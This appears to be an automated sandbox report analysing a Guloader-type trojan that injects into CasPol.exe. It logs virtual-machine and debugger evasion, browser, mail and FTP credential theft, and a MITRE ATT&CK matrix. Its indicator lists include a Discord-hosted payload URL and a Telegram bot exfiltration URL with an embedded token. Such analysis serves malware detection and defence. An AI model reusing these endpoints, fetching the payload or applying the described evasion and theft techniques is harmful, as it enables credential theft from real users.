            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054237690.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33052610742.0000000000854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE13
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054237690.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33052610742.0000000000854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6540Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9941Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349D368 rdtsc 1_2_0349D368
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01512D4A sldt word ptr [eax]3_2_01512D4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeAPI call chain: ExitProcess graph end nodegraph_1-16569
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeAPI call chain: ExitProcess graph end nodegraph_1-16350
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054237690.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33052610742.0000000000854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe13
            Source: CasPol.exe, 00000003.00000002.37820741378.000000000124B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37821581232.00000000012B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054237690.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33052610742.0000000000854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000002.33054398586.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_71461BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71461BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A6B1B mov eax, dword ptr fs:[00000030h]1_2_034A6B1B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A5A9C mov eax, dword ptr fs:[00000030h]1_2_034A5A9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AE1ED mov eax, dword ptr fs:[00000030h]1_2_034AE1ED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A10F6 mov eax, dword ptr fs:[00000030h]1_2_034A10F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AC0A9 mov eax, dword ptr fs:[00000030h]1_2_034AC0A9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034ACF3F mov eax, dword ptr fs:[00000030h]1_2_034ACF3F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349D368 rdtsc 1_2_0349D368
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AD350 LdrLoadDll,NtAllocateVirtualMemory,1_2_034AD350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1120000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.37843137887.000000001D8D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.37843137887.000000001D8D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            21
            Input Capture
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration21
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Registry Run Keys / Startup Folder
            1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model21
            Input Capture
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script251
            Virtualization/Sandbox Evasion
            LSA Secrets251
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            Data Transfer Size Limits114
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe10%VirustotalBrowse
            SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe23%ReversingLabsWin32.Trojan.Guloader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://w63iRikKzWaGjZ.orgt-gl0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://w63iRikKzWaGjZ.org0%Avira URL Cloudsafe
            http://bLCeYs.com0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            cdn.discordapp.com
            162.159.129.233
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.binfalse
                  high
                  http://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.binfalse
                    high
                    https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://w63iRikKzWaGjZ.orgt-glCasPol.exe, 00000003.00000002.37841354468.000000001D821000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://DynDns.comDynDNSCasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.telegram.orgCasPol.exe, 00000003.00000002.37844926209.000000001D978000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37843863895.000000001D90F000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://w63iRikKzWaGjZ.orgCasPol.exe, 00000003.00000002.37841354468.000000001D821000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37844105160.000000001D922000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----CasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000003.00000002.37842205909.000000001D872000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
